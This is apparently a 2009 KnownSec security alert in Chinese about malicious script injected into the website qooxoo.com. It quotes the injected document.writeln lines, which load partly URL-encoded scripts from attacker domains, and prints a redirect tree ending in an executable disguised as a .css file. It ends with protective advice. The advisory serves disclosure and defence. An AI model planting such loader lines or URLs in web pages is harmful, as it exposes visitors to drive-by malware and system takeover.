发布时间:Fri Nov 27 2009 14:35:02 UTC+0800
最后更新时间:Fri Nov 27 2009 14:35:02 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 千寻网(http://qooxoo.com/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://qooxoo.com/js/common.js

网页被嵌入恶意链接代码:
document.writeln (”<script src=\”http://k26mm.3322.or%67/google.js\”><\/script>”);

document.writeln (”<script src=\”http://sbsbsb.7766.org/3%32.js\”><\/script>”);

document.writeln (”<script src=\”http://sbsbsb.7766%2Eorg/32.js\”><\/script>”);
挂马分析:
Log generated by issmall use mdecoder 0.31
[root]http://qooxoo.com/
    [script]http://qooxoo.com/js/common.js
        [script]http://k26mm.3322.org/google.js
            [iframe]http://kanshou1.3322.org/sms/360.html?1
                [iframe]http://kanshou1.3322.org/sms/aix.html
                    [iframe]http://kanshou1.3322.org/sms/a4.htm
                        [script]http://kanshou1.3322.org/sms/14.js
                            [exe]http://www.htmlvista.com/upload/sms.css
                        [script]http://kanshou1.3322.org/sms/15.js
                        [script]http://kanshou1.3322.org/sms/17.js
                        [script]http://kanshou1.3322.org/sms/16.js
                        [script]http://kanshou1.3322.org/sms/18.js
                    [iframe]http://kanshou1.3322.org/sms/amp.htm
                        [script]http://kanshou1.3322.org/sms/ll.jpg
                        [script]http://kanshou1.3322.org/sms/ll1.jpg
                        [script]http://kanshou1.3322.org/sms/shine.jpg
                            [exe]http://www.htmlvista.com/upload/sms.css
                        [script]http://kanshou1.3322.org/sms/llll1.jpg
                        [script]http://kanshou1.3322.org/sms/llll.jpg
                        [script]http://kanshou1.3322.org/sms/lllll.jpg
                    [iframe]http://kanshou1.3322.org/sms/a90.htm
                        [script]http://kanshou1.3322.org/sms/shine.jpg
                        [script]http://kanshou1.3322.org/sms/a91.js
                        [script]http://kanshou1.3322.org/sms/a90.jpg
                    [iframe]http://kanshou1.3322.org/sms/aix2.htm
                        [iframe]http://kanshou1.3322.org/sms/af.htm
                            [iframe]http://kanshou1.3322.org/sms/i1.htm
                                [script]http://kanshou1.3322.org/sms/swfobject.js
                                [flash]http://kanshou1.3322.org/sms/i115.swf
                                    [exe]http://www.htmlvista.com/upload/sms.css
                                [flash]http://kanshou1.3322.org/sms/i47.swf
                                    [exe]http://www.htmlvista.com/upload/sms.css
                                [flash]http://kanshou1.3322.org/sms/i45.swf
                                    [exe]http://www.htmlvista.com/upload/sms.css
                                [flash]http://kanshou1.3322.org/sms/i64.swf
                                    [exe]http://www.htmlvista.com/upload/sms.css
                            [iframe]http://kanshou1.3322.org/sms/f2.htm
                                [script]http://kanshou1.3322.org/sms/swfobject.js
                                [flash]http://kanshou1.3322.org/sms/f115.swf
                                    [exe]http://www.htmlvista.com/upload/sms.css
                                [flash]http://kanshou1.3322.org/sms/f47.swf
                                    [exe]http://www.htmlvista.com/upload/sms.css
                                [flash]http://kanshou1.3322.org/sms/f45.swf
                                    [exe]http://www.htmlvista.com/upload/sms.css
                                [flash]http://kanshou1.3322.org/sms/f64.swf
                                    [exe]http://www.htmlvista.com/upload/sms.css
                            [iframe]http://kanshou1.3322.org/sms/i1.htm
                        [iframe]http://kanshou1.3322.org/sms/of.htm
                            [script]http://kanshou1.3322.org/sms/shine.jpg
                            [script]http://kanshou1.3322.org/sms/agg.jpg
                    [iframe]http://kanshou1.3322.org/sms/aix3.htm
                        [iframe]http://kanshou1.3322.org/sms/a10.htm
                            [iframe]http://kanshou1.3322.org/sms/ff.html
                                [script]http://kanshou1.3322.org/sms/if.js
                                [script]http://kanshou1.3322.org/sms/ff.jpg
                            [iframe]http://kanshou1.3322.org/sms/ie.html
                                [script]http://kanshou1.3322.org/sms/if.js
                                [script]http://kanshou1.3322.org/sms/ie.jpg
                            [iframe]http://kanshou1.3322.org/sms/ff.html
                            [iframe]http://kanshou1.3322.org/sms/ie.html
                            [iframe]http://kanshou1.3322.org/sms/ff.html
                            [iframe]http://kanshou1.3322.org/sms/ff.html
        [script]http://sbsbsb.7766.org/32.js
            [iframe]http://kanshou1.3322.org/sms/360.html?1
        [script]http://sbsbsb.7766.org/32.js
    [script]http://un.so.gougou.com/js/searchview.js
    [script]http://s.vdoing.com/u/68/35112.js
最终下载病毒文件:
http://www.htmlvista.com/upload/sms.css

通过执行以上病毒文件,来达到完全控制访问者的系统。

 该网站历史挂马次数:42
Google对该网站的判定:安全

知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:http://www.cert.org.cn/
推荐的应对方法:
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果,如果使用我们数据的请通知我们一下,我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们:
邮箱:sec@knownsec.comsec@scanw.com

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 8% [?]